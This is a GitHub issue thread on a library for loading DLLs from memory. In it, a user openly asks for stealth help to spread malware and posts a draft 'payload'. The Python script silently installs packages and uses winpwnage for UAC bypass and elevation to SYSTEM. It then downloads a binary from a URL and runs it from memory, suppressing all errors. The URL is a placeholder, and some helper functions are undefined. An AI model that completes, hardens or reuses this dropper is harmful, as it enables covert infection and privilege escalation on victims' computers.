naksyn / PythonMemoryModule

pure-python implementation of MemoryModule technique to load dll and unmanaged exe entirely from memory
Apache License 2.0
292 stars 45 forks

need help with a lil more stealth #3

Closed Mustwey closed 10 months ago

Mustwey commented 10 months ago

If I were to spread it, it would obviously be flagged by anyone with a brain due to the lib's name. Can you recommend ways of silently installing the lib directly through the code?

Mustwey commented 10 months ago

nvm, stupid issue, ignore pls

Mustwey commented 10 months ago

Another question: what versions of Python does this support? 3.12?

Mustwey commented 10 months ago

This is my payload so far. What do you recommend I add or fix?

import sys
import subprocess
import os
import ctypes
import urllib.request

def silent_install(package):
    subprocess.check_call([sys.executable, "-m", "pip", "install", package],
                          stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

def is_user_admin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

def download_and_execute(url):
    try:
        response = urllib.request.urlopen(url)
        data = response.read()
        import pythonmemorymodule
        module = pythonmemorymodule.MemoryModule(data=data, debug=False)
        entry_point = module.get_proc_addr('main')
        if entry_point:
            entry_point()
    except Exception:
        pass  # Fail silently

def run_as_admin(filepath, arguments=""):
    if not is_user_admin() or (information().admin() and not information().system()):
        try:
            scan_results = scanner(uac=True, persist=False, elevate=True).start()
            for method_type in ['uac', 'elevate']:
                if scan_results.get(method_type):
                    for method in scan_results[method_type]:
                        function(**{method_type: True}).run(id=str(method['id']), payload=[sys.executable, filepath] + arguments.split())
                        if information().system():
                            return  # Successfully elevated to SYSTEM
        except ImportError:
            pass  # Fail silently if winpwnage is not installed

        if not information().system() and not information().admin():
            ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, f"{filepath} {arguments}", None, 1)

def main():
    for lib in ["pythonmemorymodule", "winpwnage"]:
        try:
            __import__(lib)
        except ImportError:
            silent_install(lib)

    if not is_user_admin() and information().admin() and not information().system():
        run_as_admin(__file__)
        sys.exit(0)

    url = 'htt;sp//test'
    download_and_execute(url)

if __name__ == "__main__":
    main()

Mustwey commented 10 months ago

And are there any other methods I should apply, similar to this lib, for further stealth? I'm new to this and don't know anything, so please recommend.